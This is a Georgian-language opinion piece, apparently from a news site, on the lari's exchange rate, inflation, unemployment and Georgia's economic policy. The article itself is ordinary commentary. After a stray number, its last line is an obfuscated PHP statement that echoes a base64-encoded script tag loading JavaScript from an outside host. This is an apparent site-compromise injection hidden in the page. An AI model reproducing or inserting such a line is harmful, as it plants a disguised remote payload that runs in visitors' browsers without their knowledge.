celsiusi
ავერსი შნაიდერი
საქართველოში ნაკლებად მკაფიოა სავალუტო სურათი. აღსანიშნია, რომ სეზონური ფაქტორების, საპროცენტო განაკვეთების ზრდის, პოლიტიკურ და ეკონომიკურ სივრცეში აქტივობის ზრდის ფონზე მივიღეთ ეროვნული ვალუტის ისეთი მოძრაობა, რომელმაც გარკვეული პოზიტიური მოცემულობა შექმნა. თუმცა, ვალუტის კურსის გამყარების ტენდენციის მიუხედავად, უნდა აღინიშნოს, რომ კურსი ისევ წითელ ხაზებს მიღმაა.
 
აღსანიშნია ის გარემოებაც, რომ დამძიმებული სოციალურ-ეკონომიკური პროცესების ფონზე, ლარის კურსის გამყარებას ადგილი რომ არ ჰქონდეს, პროცესები კონტროლიდან გავა. სამწუხაროდ, ბოლო პერიოდში მკვეთრად გაიზარდა ფასები, უმუშევრობა, საპროცენტო განაკვეთები, ინფლაციური ზეწოლა, სიღარიბე და ვალების რაოდენობა.
 
პრაქტიკულად პროცესების მართვა შესაძლებელია, თუ არ დავუშვებთ ეკონომიკური გამოწვევების მუდმივად გლობალურ ფაქტორებზე გადაბრალებას და აღნიშნულ პრობლემებს არ შევფუთავთ. პოლიტიკა, რომელიც მცირე ეკონომიკას და ბაზარს ვერ მართავს, ის პოლიტიკა არ არის. ამიტომ, შეიძლება აღინიშნოს, რომ ეკონომიკა „ ბედის ანაბარად“ არის მიტოვებული.
 
სავალუტო მოლოდინები
 
ძლიერი ვალუტა თანაარსებობს ძლიერ ეკონომიკასთან. სამწუხაროდ, ბაზარი გამოცნობაშია - ინფლაციური პროცესები და სავალუტო ბაზრის რყევები როგორი სიღრმის, მასშტაბის თუ გავლენის იქნება.
პრაქტიკულად ქვეყანა ისეთ დილემაშია, რომ ცალკეული პოზიტიური ტენდენციებიც კი ქვეყნის ეკონომიკურ კლიმატზე არსებით გავლენას ვერ ახდენს. 
 
ფაქტოლოგია ცხადყოფს, რომ იმ სიდიდის რყევებს განიცდის ლარი, რომ სიხარული გამოხატვასაც ვერ ვასწრებთ, ისევ რყევები და მკვეთრი მოძრაობებია, რაც ბიზნესის სტაბილურობას ძირს უთხრის.
 
გრძელვადიან პერსპექტივაში, ლარის გამყარების დინამიკის შექმნისთვის დიდი მნიშვნელობა აქვს პროგრამულ აქტივობას, ეკონომიკის გამოცოცხლების პოლიტიკას, ხარჯების კონტროლს (ფისკალურ დისციპლინას), ქვეყნის ეკონომიკურ და პოლიტიკურ გარდაქმნას.
 
რეკორდული ზრდა
 
ნებისმიერი ზრდა, რომელსაც სახელმწიფო ინსტიტუტები გააჟღერებენ, არგუმენტირებული უნდა იყოს ხილული პროცესებით: შემოსავლების ზრდა, ხელფასების მატება, უმუშევრობის შემცირება, სიღარიბის კლება, ბიუჯეტის ზრდა, ვალების შემცირება, ბიზნეს ორგანიზაციების რაოდენობის ზრდა.
 
სამწუხაროდ, საქართველოს მოსახლეობის ძირითად ნაწილს შეუმცირდა ან გაუქრა შემოსავალი. ხოლო, აღნიშნულ ფონზე პოლიტიკური მიდგომები არაპროპორციული გავლენის აღმოჩნდა.
 
ეკონომიკას ზრდის პროდუქტიული ხალხი, რომლითაც მდიდარი არც პოლიტიკაა და არც ეკონომიკა.  დაუბალანსებელ კრიზისულ ვითარებაში, არ ჩანს ეკონომიკის აღდგენის პოლიტიკური ენერგია, ზრდის ტემპის საჭირო პროგრამული ეფექტი, ეკონომიკური და სამეცნიერო დინამიზმი. პოლიტიკამ არც საზოგადოების ეკონომიკურ გაძლიერებას შეუწყო ხელი (თუნდაც მათი შესაძლებლობების ფარგლებში).
 
ხაზგასმით უნდა აღინიშნოს, რომ ქვეყნაში, სულ მცირე 10-ჯერ უნდა გაიზარდოს ეკონომიკა, აქტიური ბიზნეს ორგანიზაციების რაოდენობა, ინვესტიციები, ბიუჯეტი და შემოსავლები, რომ ქვეყანამ იგრძნოს შედეგი, ხოლო მოსახლეობამ - კეთილდღეობა.
 
ქვეყანაში გვჭირდება ისეთი პოლიტიკური სუბიექტების წარმოქმნა, რომელსაც ექნება სიცოცხლისაუნარიანი ბიზნესის შექმნის აკადემიური რესურსი, რაც ჯამში შექმნის სამუშაო ადგილებს და შესაბამისად გამოიწვევს უმუშევრობის შემცირებას. დაბოლოს, ქვეყნის განვითარების კონსტრუქციას აყალიბებს აკადემიური და ქარიზმატული ენერგია.
 
 
 
 
1642
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");